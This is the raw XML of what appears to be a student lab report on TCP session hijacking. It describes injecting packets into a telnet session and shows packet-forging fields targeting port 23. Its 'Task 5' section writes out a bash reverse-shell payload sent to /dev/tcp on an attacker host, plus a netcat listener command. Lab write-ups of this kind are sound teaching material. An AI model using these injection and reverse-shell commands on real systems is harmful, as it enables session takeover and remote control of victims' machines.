          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>tcp-src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> 46864 --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>tcp-dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> 23 --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>tcp-seqnum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3680996384 --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>-window 245 --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>tcp-acknum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1899252344 --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>-ack --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">-data </w:t>
      </w:r>
      <w:r w:rsidRPr="00715936">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>5368616e675a6577656e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A89E59" w14:textId="77777777" w:rsidR="00715936" w:rsidRDefault="00715936" w:rsidP="00715936"/>
    <w:p w14:paraId="20CF8CE2" w14:textId="77777777" w:rsidR="00715936" w:rsidRDefault="00715936" w:rsidP="00715936"/>
    <w:p w14:paraId="555C77B1" w14:textId="77777777" w:rsidR="00715936" w:rsidRDefault="00715936" w:rsidP="00715936">
      <w:r>
        <w:t xml:space="preserve">This the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> packet we created and injected into the TCP session:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5768A6FA" w14:textId="5329902D" w:rsidR="00715936" w:rsidRDefault="00715936" w:rsidP="00715936">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C8D02EF" wp14:editId="1351FCCD">
            <wp:extent cx="5731510" cy="3873500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12" name="Picture 12" descr="A picture containing text,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receipt, docu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73500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DAB151" w14:textId="77777777" w:rsidR="00715936" w:rsidRDefault="00715936" w:rsidP="00715936"/>
    <w:p w14:paraId="34D14ADE" w14:textId="77777777" w:rsidR="00715936" w:rsidRDefault="00715936" w:rsidP="00715936">
      <w:r>
        <w:t>After the attack we go to the Client’s machine and check Wireshark:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C31E357" w14:textId="7F07F208" w:rsidR="00715936" w:rsidRDefault="00715936" w:rsidP="00715936"/>
    <w:p w14:paraId="00EB5F65" w14:textId="4BC67223" w:rsidR="00715936" w:rsidRDefault="00C033B9" w:rsidP="00715936">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17158EB2" wp14:editId="70EC7938">
            <wp:extent cx="5731510" cy="1224915"/>
            <wp:effectExtent l="0" t="0" r="0" b="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224915"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B7508C" w14:textId="780DA9E8" w:rsidR="00715936" w:rsidRDefault="00715936" w:rsidP="00715936">
      <w:r>
        <w:t>We can see that there are many TCP retransmission packets between the Client and the Server. The data the Attacker sent changed the sequence numbers, so the Server believes that the packet is lost and keeps trying to retransmit the packet, but it keeps being dropped by the Client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3C1687" w14:textId="7F390C96" w:rsidR="00C033B9" w:rsidRDefault="00C033B9" w:rsidP="00715936"/>
    <w:p w14:paraId="4AA4C4A3" w14:textId="7D9D664F" w:rsidR="00C033B9" w:rsidRDefault="00C033B9" w:rsidP="00715936">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C033B9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C033B9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scapy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1A6AE5A7" w14:textId="5FC7B91E" w:rsidR="00C033B9" w:rsidRDefault="00C033B9" w:rsidP="00715936">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C15A3EB" w14:textId="77777777" w:rsidR="00C033B9" w:rsidRPr="00C033B9" w:rsidRDefault="00C033B9" w:rsidP="00715936">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63DB4859" w14:textId="3F197885" w:rsidR="00715936" w:rsidRDefault="00C033B9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B1A5548" wp14:editId="0C51F465">
            <wp:extent cx="5731510" cy="3670935"/>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70935"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F315823" w14:textId="03737FAA" w:rsidR="00C033B9" w:rsidRDefault="00C033B9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C033B9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F5540F" w14:textId="191A5F10" w:rsidR="00C033B9" w:rsidRDefault="00C033B9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="009FEA0E" wp14:editId="4C80AA09">
            <wp:extent cx="5731510" cy="1224915"/>
            <wp:effectExtent l="0" t="0" r="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224915"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BDA1D6" w14:textId="3CF64AFC" w:rsidR="002D1575" w:rsidRDefault="002D1575">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26784C53" w14:textId="77777777" w:rsidR="002D1575" w:rsidRDefault="002D1575" w:rsidP="002D1575">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Task 5: Creating Reverse Shell using TCP Session Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7014D641" w14:textId="77777777" w:rsidR="002D1575" w:rsidRDefault="002D1575" w:rsidP="002D1575">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A6C6E1A" w14:textId="77777777" w:rsidR="002D1575" w:rsidRDefault="002D1575" w:rsidP="002D1575">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>To create the reverse shell, we need to conduct a TCP session hijack on the Victims VM that is telnet into the server (Observer VM in this case).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC8CA43" w14:textId="77777777" w:rsidR="002D1575" w:rsidRDefault="002D1575" w:rsidP="002D1575"/>
    <w:p w14:paraId="0911FADB" w14:textId="7524BFFF" w:rsidR="002D1575" w:rsidRPr="002D1575" w:rsidRDefault="002D1575" w:rsidP="002D1575">
      <w:r>
        <w:t xml:space="preserve">We attach the command </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>in/bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve">/@.@.@.@/9090 0&lt;&amp;1 2&gt;&amp;1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve">to the TCP Packet in the data payload. At the same time we use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve">on the Attacker VM to listen to for any potential connections on port 9090 using command </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve"> -l 9090 -v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596D86D0" w14:textId="125F2A17" w:rsidR="002D1575" w:rsidRDefault="002D1575" w:rsidP="002D1575"/>
    <w:p w14:paraId="54FDB5DD" w14:textId="1DE6998B" w:rsidR="002D1575" w:rsidRDefault="002D1575" w:rsidP="002D1575">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8D303C" w14:textId="567D69F5" w:rsidR="002D1575" w:rsidRDefault="0078756C" w:rsidP="002D1575">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2456D192" wp14:editId="29BFF292">
            <wp:extent cx="5731510" cy="414655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46550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2436B6BA" w14:textId="2DDE8A53" w:rsidR="002D1575" w:rsidRDefault="0078756C" w:rsidP="002D1575">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6D665F" w14:textId="3AC35222" w:rsidR="0078756C" w:rsidRDefault="0078756C" w:rsidP="002D1575">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7232B0F3" wp14:editId="2DDD3225">
            <wp:extent cx="5731510" cy="450088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500880"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="620CD66F" w14:textId="77777777" w:rsidR="002D1575" w:rsidRDefault="002D1575" w:rsidP="002D1575">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="218B4A80" w14:textId="5AA3E3A7" w:rsidR="002D1575" w:rsidRDefault="002D1575" w:rsidP="002D1575">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve">The connection is successful when the TCP packet is acknowledged and the command runs successfully. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA780E2" w14:textId="23198E64" w:rsidR="002D1575" w:rsidRPr="00C033B9" w:rsidRDefault="002D1575" w:rsidP="002D1575">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="002D1575" w:rsidRPr="00C033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A64"/>
    <w:rsid w:val="00193ECD"/>
    <w:rsid w:val="001A6192"/>
    <w:rsid w:val="002D1575"/>
    <w:rsid w:val="002D2FC4"/>
    <w:rsid w:val="00361A64"/>
    <w:rsid w:val="00421735"/>
    <w:rsid w:val="00455E2A"/>
    <w:rsid w:val="00674A10"/>
    <w:rsid w:val="006A11DB"/>
    <w:rsid w:val="00715936"/>
    <w:rsid w:val="0078756C"/>
    <w:rsid w:val="00C033B9"/>
    <w:rsid w:val="00F5100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6B1EC41"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{54AEF9D0-BF6D-2B4D-B7EB-D926BA7E3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1DB"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006A1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jpe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4E2A20-3337-5D41-9AEB-B1481FFEE3E7}">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33</TotalTime>
  <Pages>8</Pages>
  <Words>463</Words>
  <Characters>2641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Shang Zewen</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Student - Shang Zewen</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-02-14T10:14:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-02-16T15:37:00Z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documentId_7544</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="grammarly_documentContext">
    <vt:lpwstr>{"goals":[],"domain":"general","emotions":[],"dialect":"american"}</vt:lpwstr>
  </property>
</Properties>
</file>